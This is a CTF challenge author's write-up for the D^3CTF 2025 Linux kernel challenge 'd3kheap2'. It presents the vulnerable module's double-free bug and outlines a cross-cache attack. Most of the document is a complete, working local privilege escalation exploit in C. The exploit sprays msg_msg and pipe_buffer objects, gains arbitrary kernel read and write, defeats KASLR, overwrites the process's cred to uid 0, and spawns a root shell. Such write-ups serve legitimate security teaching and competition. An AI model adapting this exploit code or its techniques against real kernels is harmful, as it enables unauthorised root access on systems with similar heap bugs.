0x00. Before We Start

To be honest I hadn’t planned to create any challenges for this year’s D^3CTF 2025, as I hadn’t prepared ideas that are fucking cool and fancy enough as my expectation. And generally it should be the task of my junior schoolmates who hadn’t graduated from my bachelor’s university to prepare the main part of the challenges in this competition. However, due to some reality issues they hadn’t have the Pwn part done and I got to know that just 10 days before the competition start. Therefore I have to rush to stand out together with my legacy teammate Eqqie (a kind of penguin (aka QI’E in Chinese) living on the EQuatorial, who is powerful in hunting CVEs) to create Pwn challenges with poor ideas. Fortunately we finally made three Pwn challenges in the end and we still succeeded to make the Pwn part of the D^3CTF 2025 looks normal.

Though ideas we presented today might not be cool and fancy enough, I still hope that you can like them. Here comes the detailed writeup :)

0x01. D3KHEAP2 | 6 Solves

“Once I was seven years old my arttnba3 told me”

“go make yourself some d3kheap or you’ll be lonely”

“Soon I’ll be 60 years old will I think the kernel pwn is cold”

“Or will I have a lot of baby heap who can sign me in”

Copyright(c) 2025 <ディーキューブ・シーティーエフカーネル Pwn 製作委員会>

Author: arttnba3 @ L-team x El3ctronic x D^3CTF

You can get the attachment at https://github.com/arttnba3/D3CTF2025_d3kheap2.

Introduction

A very easy kernel pwn challenge that does not need to spend too many efforts on the reverse engineering. The challenge provides us with a kernel module named d3kheap2.ko , which has only the function of allocating and freeing objects from an isolated kmem_cache d3kheap2_cache. The vulnerability is that we can free an object twice due to the misconfiguration of the initialization of the reference count, which is similar to the d3kheap.

static long d3kheap2_ioctl(struct file*filp, unsigned int cmd, unsigned long arg)
{
    struct d3kheap2_ureq ureq;
    long res = 0;

    spin_lock(&d3kheap2_globl_lock);

    if (copy_from_user(&ureq, (void*) arg, sizeof(ureq))) {
        logger_error("Unable to copy request from userland!\n");
        res = -EFAULT;
        goto out;
    }

    if (ureq.idx >= D3KHEAP2_BUF_NR) {
        logger_error("Got invalid request from userland!\n");
        res = -EINVAL;
        goto out;
    }

    switch (cmd) {
    case D3KHEAP2_OBJ_ALLOC:
        if (d3kheap2_bufs[ureq.idx].buffer) {
            logger_error(
                "Expected slot [%d] has already been occupied!\n",
                ureq.idx
            );
            res = -EPERM;
            break;
        }

        d3kheap2_bufs[ureq.idx].buffer = kmem_cache_alloc(
            d3kheap2_cachep,
            GFP_KERNEL | __GFP_ZERO
        );
        if (!d3kheap2_bufs[ureq.idx].buffer) {
            logger_error("Failed to alloc new buffer on expected slot!\n");
            res = -ENOMEM;
            break;
        }

        /* vulnerability here */
        atomic_set(&d3kheap2_bufs[ureq.idx].ref_count, 1);
        atomic_inc(&d3kheap2_bufs[ureq.idx].ref_count);

        logger_info(
            "Successfully allocate new buffer for slot [%d].\n",
            ureq.idx
        );

        break;
    case D3KHEAP2_OBJ_FREE:
        if (!d3kheap2_bufs[ureq.idx].buffer) {
            logger_error(
                "Expected slot [%d] had not been allocated!\n",
                ureq.idx
            );
            res = -EPERM;
            break;
        }

        if (atomic_read(&d3kheap2_bufs[ureq.idx].ref_count) <= 0) {
            logger_error("You're not allowed to free a free slot!");
            res = -EPERM;
            break;
        }

        atomic_dec(&d3kheap2_bufs[ureq.idx].ref_count);
        kmem_cache_free(d3kheap2_cachep, d3kheap2_bufs[ureq.idx].buffer);

        logger_info(
            "Successfully free existed buffer on slot [%d].\n",
            ureq.idx
        );

        break;
    case D3KHEAP2_OBJ_EDIT:
        logger_error(
            "🕊🕊🕊 This function hadn't been completed yet bcuz I'm a pigeon!\n"
        );
        break;
    case D3KHEAP2_OBJ_SHOW:
        logger_error(
            "🕊🕊🕊 This function hadn't been completed yet bcuz I'm a pigeon!\n"
        );
        break;
    default:
        logger_error("Got invalid request from userland!\n");
        res = -EINVAL;
        break;
    }

out:
    spin_unlock(&d3kheap2_globl_lock);

    return res;
}

Exploitation

As the victim object is in a dedicated kmem_cache , we have to think outside of the box. Hence here comes the cross-cache attack:

Heap spray to allocate lots of challenge objects and then free them all to free the SLUB pages back to the BUDDY
Heap spray to allocate the freed pages into another kmem_cache , here we choose the system V IPC as the victim at the first stage
Free the dangling pointer to challenge object to create UAF on msg_msgseg and allocate again to get two reference on the same object
Free one of the reference and reallocate that as pipe_buffer, whose GFP flag is the same with msg_msgseg , both of them are allocated from kmalloc-cg (if the CONFIG_SLAB_BUCKETS is DISABLED)
Manipulate msg_msgseg and pipe_buffer to gain the arbitrary read & write capability in the kernel space

Hence we have our final exploitation in the file exp.c in this repository. The final successful rate for this is at approximately 99.32% (result after more than 1024 times automatic local test), which I think is stable enough : )

Note that you can improve the speed on uploading the exploit to the remote environment by minimizing the binary with musl-gcc (I use x86_64-gentoo-linux-musl-gcc in my test) or purely assembly code if you have enough time :)

/**
 * Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/prctl.h>

/**
 * Kernel Pwn Infrastructures
**/

#define SUCCESS_MSG(msg)    "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg)       "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg)      "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg)    puts(SUCCESS_MSG(msg))
#define log_info(msg)       puts(INFO_MSG(msg))
#define log_error(msg)      puts(ERROR_MSG(msg))

#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;

void err_exit(char *msg)
{
    printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf(SUCCESS_MSG("[*] Process binded to core ") "%d\n", core);
}

void get_root_shell(void)
{
    if(getuid()) {
        log_error("[x] Failed to get the root!");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    log_success("[+] Successful to get the root.");
    log_info("[*] Execve root shell now...");

    system("/bin/sh");

    /* to exit the process normally, instead of potential segmentation fault */
    exit(EXIT_SUCCESS);
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
	struct page *page;
	unsigned int offset, len;
	const struct pipe_buf_operations *ops;
	unsigned int flags;
	unsigned long private;
};

struct cred {
    long usage;
    uint32_t uid;
    uint32_t gid;
    uint32_t suid;
    uint32_t sgid;
    uint32_t euid;
    uint32_t egid;
    uint32_t fsuid;
    uint32_t fsgid;
};

int get_msg_queue(void)
{
    return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
 * the msgp should be a pointer to the `struct msgbuf`,
 * and the data should be stored in msgbuf.mtext
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    ((struct msgbuf*)msgp)->mtype = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}

#ifndef MSG_COPY
    #define MSG_COPY 040000
#endif

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 
                  MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

/**
 * Challenge Interface
**/

#define D3KHEAP2_OBJ_ALLOC  0x3361626e
#define D3KHEAP2_OBJ_FREE   0x74747261
#define D3KHEAP2_OBJ_EDIT   0x54433344
#define D3KHEAP2_OBJ_SHOW   0x4e575046

struct d3kheap2_ureq {
    size_t idx;
};

int d3kheap2_alloc(int fd, size_t idx)
{
    struct d3kheap2_ureq ureq = {
        .idx = idx,
    };

    return ioctl(fd, D3KHEAP2_OBJ_ALLOC, &ureq);
}

int d3kheap2_free(int fd, size_t idx)
{
    struct d3kheap2_ureq ureq = {
        .idx = idx,
    };

    return ioctl(fd, D3KHEAP2_OBJ_FREE, &ureq);
}

int d3kheap2_edit(int fd, size_t idx)
{
    struct d3kheap2_ureq ureq = {
        .idx = idx,
    };

    return ioctl(fd, D3KHEAP2_OBJ_EDIT, &ureq);
}

int d3kheap2_show(int fd, size_t idx)
{
    struct d3kheap2_ureq ureq = {
        .idx = idx,
    };

    return ioctl(fd, D3KHEAP2_OBJ_SHOW, &ureq);
}

/**
 * Exploitation procedure
**/

#define D3KHEAP2_BUF_NR 0x100
#define D3KHEAP2_OBJ_SZ 2048
#define KMALLOC_2K_OBJ_PER_SLUB 16

#define MSG_QUEUE_NR 0x400
/* it cannot be big because the system limits that */
#define MSG_SPRAY_NR 2
#define MSG_SCAVENGER_SZ (D3KHEAP2_OBJ_SZ - 0x30)
#define MSG_SPRAY_SZ (0x1000 - 0x30 + D3KHEAP2_OBJ_SZ - 8)
/* prepare_copy() will do allocation, so we use bigger size for msg_msgseg */
#define MSG_PEEK_SZ (0x1000 - 0x30 + 0x1000 - 8)
#define MSG_TAG_BASE 0x3361626e74747261

#define PIPE_FCNTL_SZ (0x1000 * 32)
#define PIPE_SPRAY_NR 0x180

struct pipe_buffer *fake_pipe_buf;
struct pipe_buf_operations *pipe_ops;
unsigned int pipe_flags;
unsigned long pipe_private;
int pipe_fd[PIPE_SPRAY_NR][2], atk_pipe[2];
int victim_pipe, ovlp_pipe;

void arbitrary_read_by_pipe(
    size_t page_addr,
    void *buf,
    size_t len,
    int atk_msgq,
    size_t *msg_buf,
    size_t msgsz,
    long msgtyp
)
{
    if (read_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0){
        err_exit("FAILED to read msg_msg and msg_msgseg!");
    }

    fake_pipe_buf = (struct pipe_buffer*) &msg_buf[511];
    fake_pipe_buf->page = (struct page*) page_addr;
    fake_pipe_buf->len = 0xff8;
    fake_pipe_buf->offset = 0;
    fake_pipe_buf->flags = pipe_flags;
    fake_pipe_buf->ops = pipe_ops;
    fake_pipe_buf->private = pipe_private;

    /*
    for (int i = 0; i < 0x80; i++) {
        char ch[8];
        for (int j = 0; j < 8; j++) {
            ch[j] = 'A' + i;
        }

        msg_buf[500 + i] = *(size_t*) ch;
    }
    */

    if (write_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0) {
        err_exit("FAILED to allocate msg_msg to overwrite pipe_buffer!");
    }

    if (read(atk_pipe[0], buf, 0xff0) < 0) {
        perror("[x] Unable to read from pipe");
        err_exit("FAILED to read from evil pipe!");
    }
}

void arbitrary_write_by_pipe(
    size_t page_addr,
    void *buf,
    size_t len,
    int atk_msgq,
    size_t *msg_buf,
    size_t msgsz,
    long msgtyp
)
{
    fake_pipe_buf = (struct pipe_buffer*) &msg_buf[516];

    if (read_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0){
        err_exit("FAILED to read msg_msg and msg_msgseg!");
    }

    fake_pipe_buf->page = (struct page*) page_addr;
    fake_pipe_buf->len = 0;
    fake_pipe_buf->offset = 0;
    fake_pipe_buf->ops = pipe_ops;

    if (write_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0) {
        err_exit("FAILED to allocate msg_msg to overwrite pipe_buffer!");
    }

    len = len > 0xffe ? 0xffe : len;

    if(write(atk_pipe[1], buf, len) < 0) {
        perror("[x] Unable to write into pipe");
        err_exit("FAILED to write into evil pipe!");
    }
}

#define D3KHEAP2_BUF_SPRAY_NR D3KHEAP2_BUF_NR

void exploit(void)
{
    struct pipe_buffer *leak_pipe_buf;
    int reclaim_msgq[MSG_QUEUE_NR], atk_msgq;
    int vuln_msgq[MSG_QUEUE_NR], evil_msgq[MSG_QUEUE_NR];
    int vulq_idx, vulm_idx, evilq_idx, evilm_idx, found;
    size_t pipe_spray_nr, msg_spray_nr;
    int d3kheap2_fd;
    char err_msg[0x1000];
    size_t buf[0x1000], msg_buf[0x1000];
    size_t kernel_leak, current_pcb_page, *comm_addr;
    uint32_t uid, gid;
    uint64_t cred_kaddr, cred_kpage_addr;
    struct cred *cred_data;
    char cred_data_buf[0x1000];
    int errno;
    struct rlimit rl;

    log_info("[*] Preparing env...");

    rl.rlim_cur = 4096;
    rl.rlim_max = 4096;
    if (setrlimit(RLIMIT_NOFILE, &rl) == -1) {
        perror("[x] setrlimit");
        err_exit("FAILED to expand file descriptor's limit!");
    }

    bind_core(0);

    memset(buf, 0, sizeof(buf));

    d3kheap2_fd = open("/proc/d3kheap2", O_RDWR);
    if (d3kheap2_fd < 0) {
        perror(ERROR_MSG("[x] Unable to open chal fd"));
        err_exit("FAILED to open /dev/d3kheap2!");
    }

    log_info("[*] Preparing msg_queue...");

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        if ((reclaim_msgq[i] = get_msg_queue()) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to allocate no.%d reclaim msg_queue",
                i
            );
            perror(err_msg);
            err_exit("FAILED to allocate msg_queue for clearing partial SLUB!");
        }
    }

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        if ((vuln_msgq[i] = get_msg_queue()) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to allocate no.%d vuln msg_queue",
                i
            );
            perror(err_msg);
            err_exit("FAILED to allocate msg_queue to be UAF!");
        }
    }

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        if ((evil_msgq[i] = get_msg_queue()) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to allocate no.%d evil msg_queue",
                i
            );
            perror(err_msg);
            err_exit("FAILED to allocate msg_queue to be evil!");
        }
    }

    if (atk_msgq = get_msg_queue() < 0) {
        perror("[x] Unable to allocate attacker msg_queue");
        err_exit("FAILED to allocate msg_queue for attacking!");
    }

    log_info("[*] Preparing msg_msg...");

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = 0; j < MSG_SPRAY_NR; j++) {
            if (write_msg(
                reclaim_msgq[i],
                buf,
                0x1000 - 0x30,
                MSG_TAG_BASE + j
            ) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to prealloc %d-%d 4k msg_msg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to spray msg_msg!");
            }
        }
    }

    log_info("[*] Preparing pipe_buffer...");

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        if (pipe(pipe_fd[i]) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to create %d pipe\n",
                i
            );
            perror(err_msg);
            err_exit("FAILED to prepare pipe_buffer!");
        }
    }

    log_info("[*] Spraying d3kheap2 buffer...");

    for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
        if ((errno = d3kheap2_alloc(d3kheap2_fd, i)) < 0) {
            printf(
                ERROR_MSG("FAILED to allocate no.")"%d"
                ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
                i,
                errno
            );
            err_exit("FAILED to allocate d3kheap2 buffer!");
        }
    }

    log_info(
        "[*] Freeing d3kheap2 buffer into buddy "
        "and reclaiming as kmalloc-cg-2k SLUB page..."
    );

    pipe_spray_nr = msg_spray_nr = 0;

    for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
        if ((i / KMALLOC_2K_OBJ_PER_SLUB) % 2 == 0) {
            continue;
        }

        if ((errno = d3kheap2_free(d3kheap2_fd, i)) < 0) {
            printf(
                ERROR_MSG("FAILED to free no.")"%d"
                ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
                i,
                errno
            );
            err_exit("FAILED to free d3kheap2 buffer!");
        }
    }

    log_info("[*] Spraying msg_msg to reclaim...");

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = 0; j < (MSG_SPRAY_NR / 2); j++) {
            if (read_msg(reclaim_msgq[i],buf,0x1000-0x30,MSG_TAG_BASE+j) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to reclaim %d-%d 4k msg_msg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to reclaim msg_msg!");
            }

            buf[520] = i;
            buf[521] = j;

            if (write_msg(vuln_msgq[i],buf,MSG_SPRAY_SZ,MSG_TAG_BASE+j) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to alloc %d-%d msg_msg with msg_msgseg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to spray msg_msg!");
            }
        }
    }

    for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
        if ((i / KMALLOC_2K_OBJ_PER_SLUB) % 2 != 0) {
            continue;
        }

        if ((errno = d3kheap2_free(d3kheap2_fd, i)) < 0) {
            printf(
                ERROR_MSG("FAILED to free no.")"%d"
                ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
                i,
                errno
            );
            err_exit("FAILED to free d3kheap2 buffer!");
        }
    }

    log_info("[*] Spraying msg_msg to reclaim...");

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = MSG_SPRAY_NR / 2; j < MSG_SPRAY_NR; j++) {
            if (read_msg(reclaim_msgq[i],buf,0x1000-0x30,MSG_TAG_BASE+j) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to reclaim %d-%d 4k msg_msg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to reclaim msg_msg!");
            }

            buf[520] = i;
            buf[521] = j;

            if (write_msg(vuln_msgq[i], buf, MSG_SPRAY_SZ, MSG_TAG_BASE+j) < 0){
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to alloc %d-%d msg_msg with msg_msgseg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to spray msg_msg!");
            }
        }
    }

    /* To be honest, we only need to free ONE obj here, just think :) */
    log_info("[*] Creating UAF on msg_msg...");

    for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
        if ((errno = d3kheap2_free(d3kheap2_fd, i)) < 0) {
            printf(
                ERROR_MSG("FAILED to free no.")"%d"
                ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
                i,
                errno
            );
            err_exit("FAILED to free d3kheap2 buffer!");
        }
    }

    found = 0;
    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = 0; j < MSG_SPRAY_NR; j++) {
            buf[520] = *(size_t*) "arttnba3";
            buf[520] += i;
            buf[521] = *(size_t*) "D3CTFPWN";
            buf[521] += j;

            if (write_msg(evil_msgq[i], buf, MSG_SPRAY_SZ, MSG_TAG_BASE + j)<0){
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to alloc %d-%d msg_msg with msg_msgseg\n",
                    i,
                    j);
                perror(err_msg);
                err_exit("FAILED to spray msg_msg!");
            }
        }
    }

    /* make sure the UAF object is on CPU SLAB, so no more spray then */
    for (int k = 0; k < MSG_QUEUE_NR; k++) {
        for (int l = 0; l < MSG_SPRAY_NR; l++) {
            if (peek_msg(vuln_msgq[k], buf, MSG_PEEK_SZ, l) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to peek %d-%d msg_msg\n",
                    k,
                    l
                );
                perror(err_msg);
                err_exit("FAILED to peek msg_msg!");
            }

            if (buf[520] == *(size_t*) "arttnba3"
                || buf[521] == *(size_t*) "D3CTFPWN") {
                evilq_idx = buf[520] - *(size_t*) "arttnba3";
                evilm_idx = buf[521] - *(size_t*) "D3CTFPWN";
                vulq_idx = k;
                vulm_idx = l;
                printf(
                    SUCCESS_MSG("[+] Found victim on no.")"%d "
                    SUCCESS_MSG("msg in no.")"%d"SUCCESS_MSG("vulqueue")
                    SUCCESS_MSG(".Same msg is on no.")"%d "
                    SUCCESS_MSG("msg in no.")"%d \n",
                    vulm_idx,
                    vulq_idx,
                    evilm_idx,
                    evilq_idx
                );
                found = 1;
                goto out_uaf_msg;
            }
        }
    }

    if (!found) {
        err_exit("FAILED to create cross-cache UAF by spraying msg_msg!");
    }

out_uaf_msg:
    log_info("[*] Shifting obj-overlapping from msg_msg to pipe_buffer...");

    if (read_msg(vuln_msgq[vulq_idx],buf,MSG_SPRAY_SZ,MSG_TAG_BASE+vulm_idx)<0){
        perror("[x] Unable to free the victim msg_msg");
        err_exit("FAILED to free victim msg_msg!");
    }

    for (int i = 0; i < (PIPE_SPRAY_NR / 2); i++) {
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 32) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to fcntl(F_SETPIPE_SZ) on no.%d pipe",
                i
            );
            perror(err_msg);
            err_exit("FAILED to reclaim msg_msg with pipe_buffer!");
        }
    }

    if (read_msg(
        evil_msgq[evilq_idx],
        buf,
        MSG_SPRAY_SZ,
        MSG_TAG_BASE + evilm_idx
    ) < 0) {
        perror("[x] Unable to free the victim msg_msg");
        err_exit("FAILED to free victim msg_msg!");
    }

    /* identification */
    for (int i = 0; i < (PIPE_SPRAY_NR / 2); i++) {
        /* The greate j8 helps us a lot :) */
        for (int j = 0; j < 8; j++) {
            write(pipe_fd[i][1], &i, sizeof(i));
        }
    }

    found = 0;
    for (int i = (PIPE_SPRAY_NR / 2); i < PIPE_SPRAY_NR; i++) {
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 32) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to fcntl(F_SETPIPE_SZ) on no.%d pipe",
                i
            );
            perror(err_msg);
            err_exit("FAILED to reclaim msg_msg with pipe_buffer!");
        }

        for (int j = 0; j < 114; j++) {
            write(pipe_fd[i][1], &i, sizeof(i));
        }

        /**
         * we keep checking to make sure that the object is allocated
         * from the first object of CPU SLUB, hence no spray later
         */
        for (int j = 0; j < (PIPE_SPRAY_NR / 2); j++) {
            int ident;
            read(pipe_fd[j][0], &ident, sizeof(ident));
            if (ident != j) {
                printf(
                    SUCCESS_MSG("[+] Found victim pipe: ")"%d"
                    SUCCESS_MSG(" , overlapped with ")"%d\n",
                    j,
                    ident
                );
                victim_pipe = j;
                ovlp_pipe = ident;
                goto out_overlap_pipe;
            }
            write(pipe_fd[j][1], &ident, sizeof(ident));
        }
    }

    if (!found) {
        err_exit("FAILED to shift OVERLAP from msg_msg to pipe_buffer!");
    }

out_overlap_pipe:
    close(pipe_fd[victim_pipe][1]);
    close(pipe_fd[victim_pipe][0]);

    if (pipe(atk_pipe) < 0 || fcntl(atk_pipe[1], F_SETPIPE_SZ, 0x1000*32) < 0) {
        err_exit("FAILED to allocate new pipe for attacking!");
    }

    /* move to pipe_buffer[1] */
    write(atk_pipe[1], "arttnba3", 8);
    read(atk_pipe[0], buf, 8);
    write(atk_pipe[1], "arttnba3", 8);

    close(pipe_fd[ovlp_pipe][1]);
    close(pipe_fd[ovlp_pipe][0]);

    memset(buf, 0, sizeof(buf));
    if (write_msg(atk_msgq, buf, MSG_SPRAY_SZ, MSG_TAG_BASE) < 0) {
        perror("[x] Unable to allocate new msg_msg");
        err_exit("FAILED to reclaim the victim pipe_buffer as msg_msg!");
    }

    write(atk_pipe[1], "arttnba3", 8);

    if (read_msg(atk_msgq, msg_buf, MSG_SPRAY_SZ, MSG_TAG_BASE) < 0) {
        perror("[x] Unable to peek the victim object");
        err_exit("FAILED to peek the victim object!");
    }

    leak_pipe_buf = (void*) &msg_buf[516];

    printf(
        SUCCESS_MSG("[+] Leak pipe_buffer::page ") "%p"
        SUCCESS_MSG(", pipe_buffer::ops ") "%p\n",
        leak_pipe_buf->page,
        leak_pipe_buf->ops
    );

    pipe_flags = leak_pipe_buf->flags;
    pipe_ops = (void*) leak_pipe_buf->ops;
    pipe_private = leak_pipe_buf->private;

    vmemmap_base = (size_t) leak_pipe_buf->page & KASLR_MASK;
    log_info("[*] Try to guess vmemmap_base...");
    printf("[*] Starts from %lx...\n", vmemmap_base);

    if (write_msg(atk_msgq, msg_buf, MSG_SPRAY_SZ, MSG_TAG_BASE) < 0) {
        perror("[x] Unable to allocate new msg_msg");
        err_exit("FAILED to reclaim the victim pipe_buffer as msg_msg!");
    }

    arbitrary_read_by_pipe(
        vmemmap_base + 0x9d000 / 0x1000 * 0x40,
        buf,
        0xff0,
        atk_msgq,
        msg_buf,
        MSG_SPRAY_SZ,
        MSG_TAG_BASE
    );

    kernel_leak = buf[0];
    for (int loop_nr = 0; 1; loop_nr++) {
        if (kernel_leak > 0xffffffff81000000
            && (kernel_leak & 0xff) < 0x100) {
            kernel_base = kernel_leak & 0xfffffffffffff000;
            if (loop_nr != 0) {
                puts("");
            }
            printf(
                INFO_MSG("[*] Leak secondary_startup_64 : ") "%lx\n",kernel_leak
            );
            printf(SUCCESS_MSG("[+] Got kernel base: ") "%lx\n", kernel_base);
            printf(SUCCESS_MSG("[+] Got vmemmap_base: ") "%lx\n", vmemmap_base);
            break;
        } else {
            printf("[?] Got leak: %lx\n", kernel_leak);
            sleep(2);
        }

        for (int i = 0; i < 80; i++) {
            putchar('\b');
        }
        printf(
            "[No.%d loop] Got unmatched data: %lx, keep looping...",
            loop_nr,
            kernel_leak
        );

        vmemmap_base -= KASLR_GRANULARITY;
        arbitrary_read_by_pipe(
            vmemmap_base + 0x9d000 / 0x1000 * 0x40,
            buf,
            0xff0,
            atk_msgq,
            msg_buf,
            MSG_SPRAY_SZ,
            MSG_TAG_BASE
        );
    }

    log_info("[*] Seeking task_struct in kernel space...");

    prctl(PR_SET_NAME, "arttnba3pwnn");
    uid = getuid();
    gid = getgid();

    for (int i = 0; 1; i++) {
        arbitrary_read_by_pipe(
            vmemmap_base + i * 0x40,
            buf,
            0xff0,
            atk_msgq,
            msg_buf,
            MSG_SPRAY_SZ,
            MSG_TAG_BASE
        );
    
        comm_addr = memmem(buf, 0xff0, "arttnba3pwnn", 12);
        if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
            && (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
            && (comm_addr[-2] == comm_addr[-3])) {  /* should be equal */

            printf(
                SUCCESS_MSG("[+] Found task_struct on page: ") "%lx\n",
                (vmemmap_base + i * 0x40)
            );
            printf(SUCCESS_MSG("[+] Got cred address: ") "%lx\n",comm_addr[-2]);

            cred_kaddr = comm_addr[-2];
            cred_data = (void*) (cred_data_buf + (cred_kaddr & (0x1000 - 1)));
            page_offset_base = cred_kaddr & KASLR_MASK;

            while (1) {
                cred_kpage_addr = vmemmap_base + \
                                (cred_kaddr - page_offset_base) / 0x1000 * 0x40;
            
                arbitrary_read_by_pipe(
                    cred_kpage_addr,
                    cred_data_buf,
                    0xff0,
                    atk_msgq,
                    msg_buf,
                    MSG_SPRAY_SZ,
                    MSG_TAG_BASE
                );
                if (cred_data->uid == uid
                    && cred_data->gid == gid) {
                    printf(
                        SUCCESS_MSG("[+] Got page_offset_base: ") "%lx\n",
                        page_offset_base
                    );
                    printf(
                        SUCCESS_MSG("[+] Found cred on page: ") "%lx\n",
                        cred_kpage_addr
                    );
                    break;
                }

                page_offset_base -= KASLR_GRANULARITY;
                puts("[?] Looping!?");
            }

            break;
        }
    }

    puts("[*] Overwriting cred and granting root privilege...");

    cred_data->uid = 0;
    cred_data->gid = 0;

    arbitrary_write_by_pipe(
        cred_kpage_addr,
        cred_data_buf,
        0xff0,
        atk_msgq,
        msg_buf,
        MSG_SPRAY_SZ,
        MSG_TAG_BASE
    );

    setresuid(0, 0, 0);
    setresgid(0, 0, 0);

    get_root_shell();

    system("/bin/sh");
}

void banner(void)
{
    puts(SUCCESS_MSG("-------- D^3CTF2025::Pwn - d3kheap2 --------") "\n"
    INFO_MSG("--------    Official Exploitation   --------\n")
    INFO_MSG("--------      Author: ")"arttnba3"INFO_MSG("      --------") "\n"
    SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));
}

int main(int argc, char **argv, char **envp)
{
    banner();
    exploit();
    return 0;
}

What’s more…

The introduction is modified from one of my favourite song when I was not 7 years old but 15 years old, which will always remind me a lot about my teenage years. I hope that this could remind you about how further the Linux kernel exploitation step out compared to the old d3kheap in D^3CTF 2022. With the amazing cross-cache attack we can almost exploit every UAF and DF vulnerabilities by transfering the SLUB pages from one kmem_cache to another. That’s the reason why I named it as d3kheap2 : Solution upgration from limited one for d3kheap’s easy double free to general one for d3kheap2’s lunatic double free.

Although the core technique for this challenge this is not a new technique in 2025 (which can even be backed to at least 2022, but I don’t know whether it’s the oldest public one), but cross-cache attack is not common in CTF in the past few years. Therefore I choose to present this technique in this year’s D^3CTF, as I’m busy in 2024 and do not present anything at that year, and in 2023 I’ve presented something else (which was plagiarized one year later on BlackHat USA 2024 by a student called Jiayi Hu who participated in that competition).

Another reason I finally chose the cross-cache attack is that I did not have too much time on completing these challenges. As I’ve graduated from my undergraduate, I did not pay too much attention on how my junior schoolmates prepared for this year’s D^3CTF, and get to know that almost no pwn challenges were created just at about 10 days before the competition started . Therefore I have to stand out to rush to create the pwn challenges with almost nothing new in research in my mind to make sure the competition can be held normally as past years. Sorry and I apologize that I didn’t bring something that is as same cool as the d3kcache in 2023. But luckily I still have something special for you, which is how I manipulate with msg_msg and pipe_buffer : tricky but useful gadgets you may be love in.

